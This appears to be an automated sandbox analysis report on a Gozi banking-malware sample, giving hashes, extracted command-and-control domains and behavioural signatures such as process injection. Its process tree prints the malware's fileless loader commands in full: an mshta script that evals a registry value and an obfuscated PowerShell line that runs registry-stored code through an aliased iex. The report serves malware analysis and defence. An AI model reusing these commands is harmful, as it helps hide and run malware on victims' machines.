Analysis
- max time kernel: 150s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20230915-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-10-2023 08:57
- Static task: static1
- Behavioral task: behavioral1
- Sample: Client.exe
- Resource: win7-20230831-en
General
- Target: Client.exe
- Size: 422KB
- MD5: c788f8e7a2d0311297bd198ca9d05ec8
- SHA1: 64240992ba99ae27b0bb4fe277a95524a4b139db
- SHA256: bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd
- SHA512: 2295c28aa11e3c1ea09f0ba790ea1e8322b3c996f4f27bf0aec9edf0997329ea8d13b98417e856f7bd922f4a0d9ef786117b8354a04b752d53e6b53733db4f5d
- SSDEEP: 6144:eH0vsBFRMXdX0tn7qnmUVR9g0pHii2B8mG+R2FLxgwExgw:eH0v4FRyX0tnWnN9pHiN4+R2NxEx
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
- base_path: /jerry/
- build: 250260
- exe_type: loader
- extension: .bob
- server_id: 50
Extracted
gozi
5050
fotexion.com
- base_path: /pictures/
- build: 250260
- exe_type: worker
- extension: .bob
- server_id: 50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
- resource: behavioral2/memory/940-0-0x0000000001500000-0x000000000150C000-memory.dmp
- yara_rule: dave
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- process: mshta.exe
- description: Key value queried
- ioc: \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation
Suspicious use of SetThreadContext 8 IoCs
Processes:
- PID 940 (Client.exe) set thread context of 2832 (control.exe)
- PID 2832 (control.exe) set thread context of 2564 (Explorer.EXE)
- PID 1416 (powershell.exe) set thread context of 2564 (Explorer.EXE)
- PID 2564 (Explorer.EXE) set thread context of 3784 (RuntimeBroker.exe)
- PID 2832 (control.exe) set thread context of 4532 (rundll32.exe)
- PID 2564 (Explorer.EXE) set thread context of 3156 (RuntimeBroker.exe)
- PID 2564 (Explorer.EXE) set thread context of 4792 (RuntimeBroker.exe)
- PID 2564 (Explorer.EXE) set thread context of 3500 (cmd.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid, process (repeated rows collapsed):
- 940 Client.exe
- 1416 powershell.exe
- 2564 Explorer.EXE
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
- 2564 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
- 940 Client.exe
- 2832 control.exe
- 1416 powershell.exe
- 2564 Explorer.EXE
- 2832 control.exe
- 2564 Explorer.EXE
- 2564 Explorer.EXE
- 2564 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
- Token: SeDebugPrivilege (1416 powershell.exe)
- Token: SeShutdownPrivilege (2564 Explorer.EXE)
- Token: SeCreatePagefilePrivilege (2564 Explorer.EXE)
- Token: SeShutdownPrivilege (2564 Explorer.EXE)
- Token: SeCreatePagefilePrivilege (2564 Explorer.EXE)
- Token: SeShutdownPrivilege (2564 Explorer.EXE)
- Token: SeCreatePagefilePrivilege (2564 Explorer.EXE)
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- 2564 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs
Processes:
- 2564 Explorer.EXE
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
Source PID (process) and target PID (process); repeated rows collapsed:
- PID 216 (mshta.exe) wrote to memory of 1416 (powershell.exe)
- PID 1416 (powershell.exe) wrote to memory of 1404 (csc.exe)
- PID 1404 (csc.exe) wrote to memory of 4704 (cvtres.exe)
- PID 940 (Client.exe) wrote to memory of 2832 (control.exe)
- PID 1416 (powershell.exe) wrote to memory of 752 (csc.exe)
- PID 752 (csc.exe) wrote to memory of 3600 (cvtres.exe)
- PID 2832 (control.exe) wrote to memory of 2564 (Explorer.EXE)
- PID 1416 (powershell.exe) wrote to memory of 2564 (Explorer.EXE)
- PID 2564 (Explorer.EXE) wrote to memory of 3784 (RuntimeBroker.exe)
- PID 2832 (control.exe) wrote to memory of 4532 (rundll32.exe)
- PID 2564 (Explorer.EXE) wrote to memory of 3156 (RuntimeBroker.exe)
- PID 2564 (Explorer.EXE) wrote to memory of 4792 (RuntimeBroker.exe)
- PID 2564 (Explorer.EXE) wrote to memory of 3500 (cmd.exe)
Processes
Command lines, with the tree depth in brackets:

[1] C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\Explorer.EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of UnmapMainImage
    - Suspicious use of WriteProcessMemory
  [2] "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\control.exe -h
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
      [4] "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
  [2] "C:\Windows\System32\mshta.exe" "about:<hta:application><script>L8kj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(L8kj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uxgtak -value gp; new-alias -name eybtmdmub -value iex; eybtmdmub ([System.Text.Encoding]::ASCII.GetString((uxgtak "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20cwjbn4\20cwjbn4.cmdline"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32F2.tmp" "c:\Users\Admin\AppData\Local\Temp\20cwjbn4\CSC52B7EE14C994448EAF819F33A05BA9AB.TMP"
      [4] "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ks23o1vi\ks23o1vi.cmdline"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES33CD.tmp" "c:\Users\Admin\AppData\Local\Temp\ks23o1vi\CSC7AE502D2B30548C58CA85FC1F09AB123.TMP"
  [2] "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads